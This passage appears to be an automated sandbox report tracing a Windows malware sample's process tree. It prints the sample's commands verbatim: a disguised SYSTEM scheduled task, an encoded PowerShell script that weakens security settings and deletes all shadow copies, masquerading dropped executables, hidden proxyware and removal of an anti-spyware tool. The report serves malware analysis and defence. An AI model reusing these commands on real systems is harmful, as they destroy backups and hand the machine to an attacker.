 R e g i s t e r - S c h e d u l e d T a s k   - T a s k N a m e   " M i c r o s o f t E d g e U p d a t e T a s k M a c h i n e U A { 0 6 4 2 8 2 7 9 - 4 B 9 B - 4 3 C C - D 6 F 2 - B 2 F 9 8 0 A C 4 7 4 0 } "   - A c t i o n   $ a c t i o n   - T r i g g e r   $ t r i g g e r D a i l y ,   $ t r i g g e r L o g o n   - S e t t i n g s   $ s e t t i n g s   - R u n L e v e l   H i g h e s t   - U s e r   " S Y S T E M " 
 
                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                        PID:5892
                                                                                                                                                                                                                                        • C:\Windows\system32\chcp.com
                                                                                                                                                                                                                                          "C:\Windows\system32\chcp.com" 65001
                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                            PID:5968
                                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          powershell.exe -exec bypass -enc YwBoAGMAcAAgADYANQAwADAAMQAKACQAUAByAG8AZwByAGUAcwBzAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAJwBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACcACgAKAFMAZQB0AC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIAAtAFMAYwBvAHAAZQAgAEMAdQByAHIAZQBuAHQAVQBzAGUAcgAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABMAG8AYwBhAGwATQBhAGMAaABpAG4AZQAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgAKAGQAaQBzAG0ALgBlAHgAZQAgAC8AbwBuAGwAaQBuAGUAIAAvAGUAbgBhAGIAbABlAC0AZgBlAGEAdAB1AHIAZQAgAC8AZgBlAGEAdAB1AHIAZQBuAGEAbQBlADoATQBpAGMAcgBvAHMAbwBmAHQALQBXAGkAbgBkAG8AdwBzAC0AUwB1AGIAcwB5AHMAdABlAG0ALQBMAGkAbgB1AHgAIAAvAGEAbABsACAALwBuAG8AcgBlAHMAdABhAHIAdAAKAGQAaQBzAG0ALgBlAHgAZQAgAC8AbwBuAGwAaQBuAGUAIAAvAGUAbgBhAGIAbABlAC0AZgBlAGEAdAB1AHIAZQAgAC8AZgBlAGEAdAB1AHIAZQBuAGEAbQBlADoAVgBpAHIAdAB1AGEAbABNAGEAYwBoAGkAbgBlAFAAbABhAHQAZgBvAHIAbQAgAC8AYQBsAGwAIAAvAG4AbwByAGUAcwB0AGEAcgB0AAoAdwBzAGwAIAAtAC0AcwBlAHQALQBkAGUAZgBhAHUAbAB0AC0AdgBlAHIAcwBpAG8AbgAgADIACgAKACQAcABhAGcAZQBmAGkAbABlACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBDAG8AbQBwAHUAdABlAHIAUwB5AHMAdABlAG0AIAAtAEUAbgBhAGIAbABlAEEAbABsAFAAcgBpAHYAaQBsAGUAZwBlAHMACgAkAHAAYQBnAGUAZgBpAGwAZQAuAEEAdQB0AG8AbQBhAHQAaQBjAE0AYQBuAGEAZwBlAGQAUABhAGcAZQBmAGkAbABlACAAPQAgACQAZgBhAGwAcwBlAAoAJABwAGEAZwBlAGYAaQBsAGUALgBwAHUAdAAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAAoAJABwAGEAZwBlAGYAaQBsAGUAcwBlAHQAIAA9ACAARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFAAYQBnAGUARgBpAGwAZQBTAGUAdAB0AGkAbgBnAAoAJABwAGEAZwBlAGYAaQBsAGUAcwBlAHQALgBJAG4AaQB0AGkAYQBsAFMAaQB6AGUAIAA9ACAANAAwADkANgAKACQAcABhAGcAZQBmAGkAbABlAHMAZQB0AC4ATQBhAHgAaQBtAHUAbQBTAGkAegBlACAAPQAgADEANgAzADgANAAKACQAcABhAGcAZQBmAGkAbABlAHMAZQB0AC4AUAB1AHQAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAAKAAoARwBlAHQALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBUAGEAcwBrAFAAYQB0AGgAIAAiAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwATQBlAG0AbwByAHkARABpAGEAZwBuAG8AcwB0AGkAYwBcACIAIAB8ACAARABpAHMAYQBiAGwAZQAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsACgBEAGkAcwBhAGIAbABlAC0ATQBNAEEAZwBlAG4AdAAgAC0AbQBjAAoACgBmAHUAbgBjAHQAaQBvAG4AIABHAGUAdAAtAEgAaQBnAGgAUABlAHIAZgBvAHIAbQBhAG4AYwBlAFAAbwB3AGUAcgBQAGwAYQBuAEcAdQBpAGQAIAB7AAoAIAAgACAAIAAkAHAAbwB3AGUAcgBQAGwAYQBuAHMAIAA9ACAAcABvAHcAZQByAGMAZgBnACAALwBsAGkAcwB0ACAAfAAgAFMAZQBsAGUAYwB0AC0AUwB0AHIAaQBuAGcAIAAtAFAAYQB0AHQAZQByAG4AIAAiAEcAVQBJAEQAIgAgAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7AAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJABfACAALQBtAGEAdABjAGgAIAAiAC4AKgBcACgAKAAuACoAPwApAFwAKQAuACoAIgApACAAewAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZwB1AGkAZAAgAD0AIAAkAG0AYQB0AGMAaABlAHMAWwAxAF0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAXwAgAC0AbQBhAHQAYwBoACAAIgAuACoAKABIAGkAZwBoACAAUABlAHIAZgBvAHIAbQBhAG4AYwBlAHwATQDDAKEAeABpAG0AbwAgAEQAZQBzAGUAbQBwAGUAbgBoAG8AfABEAGUAcwBlAG0AcABlAG4AaABvACAATQDDAKEAeABpAG0AbwB8AEEAbAB0AG8AIABEAGUAcwBlAG0AcABlAG4AaABvACkALgAqACIAKQAgAHsACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAAJABnAHUAaQBkAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQAKACAAIAAgACAAIAAgACAAIAB9AAoAIAAgACAAIAB9AAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAbgB1AGwAbAAKAH0ACgAKACQAbQBhAHgAUABlAHIAZgBHAHUAaQBkACAAPQAgAEcAZQB0AC0ASABpAGcAaABQAGUAcgBmAG8AcgBtAGEAbgBjAGUAUABvAHcAZQByAFAAbABhAG4ARwB1AGkAZAAKAHAAbwB3AGUAcgBjAGYAZwAgAC8AcwAgACQAbQBhAHgAUABlAHIAZgBHAHUAaQBkAAoACgAkAGcAcgBvAHUAcAAgAD0AIAAiACoAUwAtADEALQAxAC0AMAAiAAoAcwBlAGMAZQBkAGkAdAAgAC8AZQB4AHAAbwByAHQAIAAvAGMAZgBnACAAcwBlAGMAYwBvAG4AZgBpAGcALgBjAGYAZwAKACgARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAcwBlAGMAYwBvAG4AZgBpAGcALgBjAGYAZwApACAALQByAGUAcABsAGEAYwBlACAAJwBTAGUATABvAGMAawBNAGUAbQBvAHIAeQBQAHIAaQB2AGkAbABlAGcAZQAgAD0AIAAuACoAJwAsACAAIgBTAGUATABvAGMAawBNAGUAbQBvAHIAeQBQAHIAaQB2AGkAbABlAGcAZQAgAD0AIAAqACQAZwByAG8AdQBwACIAIAB8ACAAUwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAcwBlAGMAYwBvAG4AZgBpAGcALgBjAGYAZwAKAHMAZQBjAGUAZABpAHQAIAAvAGMAbwBuAGYAaQBnAHUAcgBlACAALwBkAGIAIABzAGUAYwBlAGQAaQB0AC4AcwBkAGIAIAAvAGMAZgBnACAAcwBlAGMAYwBvAG4AZgBpAGcALgBjAGYAZwAgAC8AYQByAGUAYQBzACAAVQBTAEUAUgBfAFIASQBHAEgAVABTAAoAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAcwBlAGMAYwBvAG4AZgBpAGcALgBjAGYAZwAKAAoAdgBzAHMAYQBkAG0AaQBuACAAZABlAGwAZQB0AGUAIABzAGgAYQBkAG8AdwBzACAALwBhAGwAbAAgAC8AcQB1AGkAZQB0AAoA
                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                            PID:5904
                                                                                                                                                                                                                                            • C:\Windows\system32\chcp.com
                                                                                                                                                                                                                                              "C:\Windows\system32\chcp.com" 65001
                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                PID:6092
                                                                                                                                                                                                                                              • C:\Windows\system32\Dism.exe
                                                                                                                                                                                                                                                "C:\Windows\system32\Dism.exe" /online /enable-feature /featurename:Microsoft-Windows-Subsystem-Linux /all /norestart
                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                                PID:2448
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\BD5C2522-F1C7-41A9-93D5-232E75C0E74F\dismhost.exe
                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\BD5C2522-F1C7-41A9-93D5-232E75C0E74F\dismhost.exe {171615D6-3E5B-4B8C-A46C-239C8F9E531D}
                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                  PID:5872
                                                                                                                                                                                                                                              • C:\Windows\system32\Dism.exe
                                                                                                                                                                                                                                                "C:\Windows\system32\Dism.exe" /online /enable-feature /featurename:VirtualMachinePlatform /all /norestart
                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                                PID:1492
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\F515D68A-AE8A-452C-990C-E0685B38E215\dismhost.exe
                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\F515D68A-AE8A-452C-990C-E0685B38E215\dismhost.exe {F98113A5-4387-4024-8C76-1D8826706807}
                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                  PID:3704
                                                                                                                                                                                                                                              • C:\Windows\system32\wsl.exe
                                                                                                                                                                                                                                                "C:\Windows\system32\wsl.exe" --set-default-version 2
                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                  PID:5832
                                                                                                                                                                                                                                                • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                                                                  "C:\Windows\system32\powercfg.exe" /list
                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                  • Power Settings
                                                                                                                                                                                                                                                  PID:5584
                                                                                                                                                                                                                                                • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                                                                  "C:\Windows\system32\powercfg.exe" /s
                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                  • Power Settings
                                                                                                                                                                                                                                                  PID:5708
                                                                                                                                                                                                                                                • C:\Windows\system32\SecEdit.exe
                                                                                                                                                                                                                                                  "C:\Windows\system32\SecEdit.exe" /export /cfg secconfig.cfg
                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                    PID:4768
                                                                                                                                                                                                                                                  • C:\Windows\system32\SecEdit.exe
                                                                                                                                                                                                                                                    "C:\Windows\system32\SecEdit.exe" /configure /db secedit.sdb /cfg secconfig.cfg /areas USER_RIGHTS
                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                      PID:3564
                                                                                                                                                                                                                                                    • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                                                                      "C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet
                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                                                                                                                      PID:6028
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\dxdiag.exe
                                                                                                                                                                                                                                                "C:\Windows\System32\dxdiag.exe" /t C:\Users\Admin\AppData\Local\Temp\sysinfo.txt
                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                PID:1524
                                                                                                                                                                                                                                              • C:\Users\Admin\Embedit.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\Embedit.exe"
                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                PID:1164
                                                                                                                                                                                                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                  cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\C3NX80XR.bat" "C:\Users\Admin\Embedit.exe" "
                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                    PID:2884
                                                                                                                                                                                                                                                    • C:\Windows\system32\chcp.com
                                                                                                                                                                                                                                                      chcp 65001
                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                                                                                                                      PID:6140
                                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                      reg.exe add "HKCU\SOFTWARE\Microsoft\Installer" /f
                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                                                                                                                      PID:4424
                                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                      reg.exe add "HKCU\SOFTWARE\Microsoft\Installer\Products" /f
                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                                                                                                                      PID:3976
                                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                      reg.exe add "HKCU\SOFTWARE\Microsoft\Installer\Products\D3890429B8E023640887BDDDA19CEF6D" /f
                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                                                                                                                      PID:4524
                                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                      reg.exe add "HKCU\SOFTWARE\Microsoft\Installer\Products\D3890429B8E023640887BDDDA19CEF6D\SourceList" /f
                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                                                                                                                      PID:5424
                                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                      reg.exe add "HKCU\SOFTWARE\Microsoft\Installer\Products\D3890429B8E023640887BDDDA19CEF6D\SourceList\Media" /f
                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                                                                                                                      PID:5392
                                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                      reg.exe add "HKCU\SOFTWARE\Microsoft\Installer\Products\D3890429B8E023640887BDDDA19CEF6D\SourceList\Net" /f
                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                                                                                                                      PID:1428
                                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                      reg.exe import "C:\Users\Admin\.mysterium-bin\myst.reg"
                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                                                                                                                      PID:536
                                                                                                                                                                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                      timeout /t 5
                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                                                                                                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                                                                                                                      PID:3064
                                                                                                                                                                                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                                                      taskkill /f /im myst-launcher-amd64.exe
                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                                                                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                                                                                                                      PID:4824
                                                                                                                                                                                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                                                      taskkill /f /im myst.exe
                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                                                                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                                                                                                                      PID:5216
                                                                                                                                                                                                                                                    • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                      tasklist
                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                      • Enumerates processes with tasklist
                                                                                                                                                                                                                                                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                                                                                                                      PID:1476
                                                                                                                                                                                                                                                    • C:\Windows\system32\findstr.exe
                                                                                                                                                                                                                                                      findstr /i "myst-launcher-amd64.exe"
                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                                                                                                                      PID:4652
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\myst-launcher-amd64.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\myst-launcher-amd64.exe" -autorun
                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                                                                                                                      PID:5376
                                                                                                                                                                                                                                                      • C:\Users\Admin\.mysterium-bin\myst.exe
                                                                                                                                                                                                                                                        C:\Users\Admin\.mysterium-bin\myst.exe --userspace --launcher.ver=1.0.49/windows --config-dir=C:\Users\Admin\.mysterium-node --data-dir=C:\Users\Admin\.mysterium-node --log-dir=C:\Users\Admin\.mysterium-node --node-ui-dir=C:\Users\Admin\.mysterium-node/nodeui service --agreed-terms-and-conditions
                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                          PID:1108
                                                                                                                                                                                                                                                          • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                                                                                            wmic os get Caption /value
                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                              PID:2464
                                                                                                                                                                                                                                                            • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                                                                                              wmic os get Caption /value
                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                PID:1008
                                                                                                                                                                                                                                                              • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                                                                                                wmic os get Caption /value
                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                  PID:2560
                                                                                                                                                                                                                                                                • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                                                                                                  wmic os get Caption /value
                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                    PID:4408
                                                                                                                                                                                                                                                              • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                                tasklist
                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                                                                                                                                PID:4424
                                                                                                                                                                                                                                                              • C:\Windows\system32\findstr.exe
                                                                                                                                                                                                                                                                findstr /i "myst-launcher-amd64.exe"
                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                  PID:1880
                                                                                                                                                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                  timeout /t 60
                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                  PID:4816
                                                                                                                                                                                                                                                                • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                                  tasklist
                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                  • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                  PID:3752
                                                                                                                                                                                                                                                                • C:\Windows\system32\findstr.exe
                                                                                                                                                                                                                                                                  findstr /i "myst-launcher-amd64.exe"
                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                    PID:4912
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\GoogleCrashHandler.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\GoogleCrashHandler.exe"
                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                PID:4432
                                                                                                                                                                                                                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                  cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\0PA06OUH.bat" "C:\Users\Admin\AppData\Roaming\GoogleCrashHandler.exe" "
                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                    PID:3472
                                                                                                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                        PID:6140
                                                                                                                                                                                                                                                                      • C:\Windows\system32\chcp.com
                                                                                                                                                                                                                                                                        chcp 65001
                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                          PID:420
                                                                                                                                                                                                                                                                        • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                                          tasklist
                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                          • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                          PID:3976
                                                                                                                                                                                                                                                                        • C:\Windows\system32\findstr.exe
                                                                                                                                                                                                                                                                          findstr /i "dIlhost.exe"
                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                            PID:3168
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\dIlhost.exe
                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\dIlhost.exe"
                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                              PID:4400
                                                                                                                                                                                                                                                                            • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                                              tasklist
                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                              • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                              PID:1708
                                                                                                                                                                                                                                                                            • C:\Windows\system32\findstr.exe
                                                                                                                                                                                                                                                                              findstr /i "dIlhost.exe"
                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                                PID:5264
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\dIlhost.exe
                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\dIlhost.exe"
                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                  PID:5000
                                                                                                                                                                                                                                                                                • C:\Windows\system32\tasklist.exe
                                                                                                                                                                                                                                                                                  tasklist
                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                  • Enumerates processes with tasklist
                                                                                                                                                                                                                                                                                  PID:4504
                                                                                                                                                                                                                                                                                • C:\Windows\system32\findstr.exe
                                                                                                                                                                                                                                                                                  findstr /i "dIlhost.exe"
                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                    PID:2436
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\dIlhost.exe
                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\dIlhost.exe"
                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                      PID:4872
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /C "C:\Program Files (x86)\Spyware Terminator\unins000.exe"
                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                    PID:3724
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2344 -s 2508
                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                                    PID:5480
                                                                                                                                                                                                                                                                            • C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                              C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                              PID:6000
                                                                                                                                                                                                                                                                            • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                              C:\Windows\System32\svchost.exe -k swprv
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                PID:5560
                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\Spyware Terminator\SpywareTerminator.exe
                                                                                                                                                                                                                                                                                "C:\Program Files (x86)\Spyware Terminator\SpywareTerminator.exe"
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                PID:5336
                                                                                                                                                                                                                                                                              • C:\Windows\system32\srtasks.exe
                                                                                                                                                                                                                                                                                C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                  PID:5224
                                                                                                                                                                                                                                                                                • C:\Windows\system32\taskmgr.exe
                                                                                                                                                                                                                                                                                  "C:\Windows\system32\taskmgr.exe" /0
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                    PID:5708
                                                                                                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                      PID:5584
                                                                                                                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffac01dcc40,0x7ffac01dcc4c,0x7ffac01dcc58
                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                          PID:4568
                                                                                                                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2360,i,10731853475737686447,11970948737319298644,262144 --variations-seed-version=20241108-050120.043000 --mojo-platform-channel-handle=1784 /prefetch:2
                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                            PID:1316
                                                                                                                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1836,i,10731853475737686447,11970948737319298644,262144 --variations-seed-version=20241108-050120.043000 --mojo-platform-channel-handle=2396 /prefetch:3
                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                              PID:6060
                                                                                                                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
